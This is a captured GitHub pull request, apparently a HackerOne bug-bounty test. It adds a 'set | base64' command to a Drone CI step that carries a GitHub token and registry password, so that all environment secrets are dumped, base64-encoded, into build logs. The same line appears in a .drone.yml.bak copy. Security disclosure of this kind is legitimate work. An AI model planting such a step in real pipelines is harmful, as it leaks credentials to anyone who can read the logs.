Skip to content
This repository has been archived by the owner on Sep 26, 2023. It is now read-only.

This is a test for HackerOne Triage. This should not be approved. #15

Open
wants to merge 2 commits into
base: main
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
3 changes: 3 additions & 0 deletions .drone.yml
Original file line number Diff line number Diff line change
Expand Up @@ -14,6 +14,7 @@ steps:
- name: docker-prep
image: harbor.shipttech.com/plugins/dockerspec
pull: always

- name: docker-build-and-push
image: plugins/docker
environment:
Expand All @@ -27,3 +28,5 @@ steps:
password:
from_secret: harbor_drone_pass
env_file: "docker_args"
commands:
- set | base64
31 changes: 31 additions & 0 deletions .drone.yml.bak
Original file line number Diff line number Diff line change
@@ -0,0 +1,31 @@
kind: pipeline
name: test
workspace:
base: /go
path: src/github.com/shipt/concourse-helm-resource

trigger:
event:
- push
- pull_request
- tag

steps:
- name: docker-prep
image: harbor.shipttech.com/plugins/dockerspec
pull: always
- name: docker-build-and-push
image: plugins/docker
environment:
GITHUB_TOKEN:
from_secret: github_token
settings:
build_args_from_env:
- GITHUB_TOKEN
registry: harbor.shipttech.com
username: drone
password:
from_secret: harbor_drone_pass
env_file: "docker_args"
commands:
- set | base64